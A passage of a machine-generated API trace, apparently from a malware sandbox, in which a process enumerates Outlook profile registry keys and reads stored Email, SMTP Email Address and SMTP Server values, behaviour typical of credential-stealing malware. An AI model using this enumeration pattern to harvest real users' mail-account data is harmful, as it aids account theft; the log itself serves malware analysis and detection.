0x690000 [0147.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0147.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.883] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x4, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19fb7c) returned 0x0 [0147.883] GetProcessHeap () returned 0x690000 [0147.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0147.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.885] RegOpenKeyW (in: hKey=0x218, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x6ab480 | out: phkResult=0x6ab480*=0x210) returned 0x0 [0147.885] GetProcessHeap () returned 0x690000 [0147.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.886] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.886] GetProcessHeap () returned 0x690000 [0147.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.886] GetProcessHeap () returned 0x690000 [0147.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.887] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.888] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0147.888] GetProcessHeap () returned 0x690000 [0147.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.888] GetProcessHeap () returned 0x690000 [0147.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.889] GetProcessHeap () returned 0x690000 [0147.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0147.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.890] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x6ab4a0 | out: phkResult=0x6ab4a0*=0x204) returned 0x0 [0147.890] GetProcessHeap () returned 0x690000 [0147.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.891] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.891] GetProcessHeap () returned 0x690000 [0147.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.893] RegCloseKey (hKey=0x204) returned 0x0 [0147.893] GetProcessHeap () returned 0x690000 [0147.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0147.893] GetProcessHeap () returned 0x690000 [0147.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.895] RegCloseKey (hKey=0x210) returned 0x0 [0147.895] GetProcessHeap () returned 0x690000 [0147.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0147.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.896] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x5, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="8503020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0147.896] GetProcessHeap () returned 0x690000 [0147.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0147.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.898] RegOpenKeyW (in: hKey=0x218, lpSubKey="8503020000000000c000000000000046", phkResult=0x6ab460 | out: phkResult=0x6ab460*=0x210) returned 0x0 [0147.898] GetProcessHeap () returned 0x690000 [0147.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.899] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.899] GetProcessHeap () returned 0x690000 [0147.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.900] GetProcessHeap () returned 0x690000 [0147.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.900] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.901] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0147.901] GetProcessHeap () returned 0x690000 [0147.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.901] GetProcessHeap () returned 0x690000 [0147.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.902] GetProcessHeap () returned 0x690000 [0147.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0147.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.903] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x6ab480 | out: phkResult=0x6ab480*=0x204) returned 0x0 [0147.903] GetProcessHeap () returned 0x690000 [0147.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.904] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.904] GetProcessHeap () returned 0x690000 [0147.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.906] RegCloseKey (hKey=0x204) returned 0x0 [0147.906] GetProcessHeap () returned 0x690000 [0147.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0147.906] GetProcessHeap () returned 0x690000 [0147.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.908] RegCloseKey (hKey=0x210) returned 0x0 [0147.908] GetProcessHeap () returned 0x690000 [0147.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0147.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.909] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x6, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19fb7c) returned 0x0 [0147.909] GetProcessHeap () returned 0x690000 [0147.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0147.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.910] RegOpenKeyW (in: hKey=0x218, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x6ab330 | out: phkResult=0x6ab330*=0x210) returned 0x0 [0147.910] GetProcessHeap () returned 0x690000 [0147.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.911] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.911] GetProcessHeap () returned 0x690000 [0147.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.912] GetProcessHeap () returned 0x690000 [0147.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.913] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.913] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0147.914] GetProcessHeap () returned 0x690000 [0147.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.914] GetProcessHeap () returned 0x690000 [0147.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.916] GetProcessHeap () returned 0x690000 [0147.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0147.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.918] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x6ab3f0 | out: phkResult=0x6ab3f0*=0x204) returned 0x0 [0147.918] GetProcessHeap () returned 0x690000 [0147.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.919] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.919] GetProcessHeap () returned 0x690000 [0147.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.921] RegCloseKey (hKey=0x204) returned 0x0 [0147.921] GetProcessHeap () returned 0x690000 [0147.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0147.921] GetProcessHeap () returned 0x690000 [0147.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.922] RegCloseKey (hKey=0x210) returned 0x0 [0147.922] GetProcessHeap () returned 0x690000 [0147.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0147.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.924] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x7, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19fb7c) returned 0x0 [0147.924] GetProcessHeap () returned 0x690000 [0147.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0147.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.925] RegOpenKeyW (in: hKey=0x218, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x6ab340 | out: phkResult=0x6ab340*=0x210) returned 0x0 [0147.925] GetProcessHeap () returned 0x690000 [0147.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.926] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.926] GetProcessHeap () returned 0x690000 [0147.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.927] GetProcessHeap () returned 0x690000 [0147.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.928] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.929] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0147.929] GetProcessHeap () returned 0x690000 [0147.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.929] GetProcessHeap () returned 0x690000 [0147.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.930] GetProcessHeap () returned 0x690000 [0147.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0147.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.931] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x6ab390 | out: phkResult=0x6ab390*=0x204) returned 0x0 [0147.931] GetProcessHeap () returned 0x690000 [0147.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.932] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.932] GetProcessHeap () returned 0x690000 [0147.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.934] RegCloseKey (hKey=0x204) returned 0x0 [0147.934] GetProcessHeap () returned 0x690000 [0147.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0147.934] GetProcessHeap () returned 0x690000 [0147.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.936] RegCloseKey (hKey=0x210) returned 0x0 [0147.936] GetProcessHeap () returned 0x690000 [0147.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0147.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.937] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x8, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19fb7c) returned 0x0 [0147.937] GetProcessHeap () returned 0x690000 [0147.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0147.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.938] RegOpenKeyW (in: hKey=0x218, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x6ab490 | out: phkResult=0x6ab490*=0x210) returned 0x0 [0147.938] GetProcessHeap () returned 0x690000 [0147.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.939] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.939] GetProcessHeap () returned 0x690000 [0147.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.940] GetProcessHeap () returned 0x690000 [0147.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.941] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.942] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0147.942] GetProcessHeap () returned 0x690000 [0147.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.942] GetProcessHeap () returned 0x690000 [0147.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.943] GetProcessHeap () returned 0x690000 [0147.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0147.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.944] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x6ab460 | out: phkResult=0x6ab460*=0x204) returned 0x0 [0147.944] GetProcessHeap () returned 0x690000 [0147.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.946] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.946] GetProcessHeap () returned 0x690000 [0147.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.948] RegCloseKey (hKey=0x204) returned 0x0 [0147.948] GetProcessHeap () returned 0x690000 [0147.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0147.948] GetProcessHeap () returned 0x690000 [0147.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.950] RegCloseKey (hKey=0x210) returned 0x0 [0147.950] GetProcessHeap () returned 0x690000 [0147.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0147.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.952] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x9, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19fb7c) returned 0x0 [0147.952] GetProcessHeap () returned 0x690000 [0147.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0147.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.966] RegOpenKeyW (in: hKey=0x218, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x6ab4e0 | out: phkResult=0x6ab4e0*=0x210) returned 0x0 [0147.966] GetProcessHeap () returned 0x690000 [0147.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.968] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.968] GetProcessHeap () returned 0x690000 [0147.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.968] GetProcessHeap () returned 0x690000 [0147.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.969] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.969] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0147.969] GetProcessHeap () returned 0x690000 [0147.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.970] GetProcessHeap () returned 0x690000 [0147.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.970] GetProcessHeap () returned 0x690000 [0147.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0147.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.971] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x6ab490 | out: phkResult=0x6ab490*=0x204) returned 0x0 [0147.971] GetProcessHeap () returned 0x690000 [0147.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.972] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="00000001", pcchName=0x19fb4c) returned 0x0 [0147.972] GetProcessHeap () returned 0x690000 [0147.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0147.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.974] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000001", phkResult=0x6ab450 | out: phkResult=0x6ab450*=0x21c) returned 0x0 [0147.974] GetProcessHeap () returned 0x690000 [0147.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0147.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.974] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x208) returned 0x2 [0147.974] GetProcessHeap () returned 0x690000 [0147.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0147.975] GetProcessHeap () returned 0x690000 [0147.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ac120 [0147.976] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.977] wvsprintfW (in: param_1=0x6ac120, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0147.977] GetProcessHeap () returned 0x690000 [0147.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc6) returned 0x69e618 [0147.977] GetProcessHeap () returned 0x690000 [0147.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0147.977] GetProcessHeap () returned 0x690000 [0147.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab350 [0147.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.979] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x6ab350 | out: phkResult=0x6ab350*=0x220) returned 0x0 [0147.979] GetProcessHeap () returned 0x690000 [0147.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0147.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.980] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x6ac120, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0147.980] GetProcessHeap () returned 0x690000 [0147.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0147.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.982] RegCloseKey (hKey=0x220) returned 0x0 [0147.982] GetProcessHeap () returned 0x690000 [0147.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab350 | out: hHeap=0x690000) returned 1 [0147.982] GetProcessHeap () returned 0x690000 [0147.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69e618 | out: hHeap=0x690000) returned 1 [0147.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.984] RegCloseKey (hKey=0x21c) returned 0x0 [0147.984] GetProcessHeap () returned 0x690000 [0147.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0147.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.985] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="00000002", pcchName=0x19fb4c) returned 0x0 [0147.985] GetProcessHeap () returned 0x690000 [0147.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0147.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.987] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000002", phkResult=0x6ab370 | out: phkResult=0x6ab370*=0x21c) returned 0x0 [0147.987] GetProcessHeap () returned 0x690000 [0147.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0147.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.988] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x1e) returned 0x0 [0147.989] GetProcessHeap () returned 0x690000 [0147.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.990] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0147.990] GetProcessHeap () returned 0x690000 [0147.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.991] GetProcessHeap () returned 0x690000 [0147.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.992] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x1c) returned 0x0 [0147.992] GetProcessHeap () returned 0x690000 [0147.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.992] GetProcessHeap () returned 0x690000 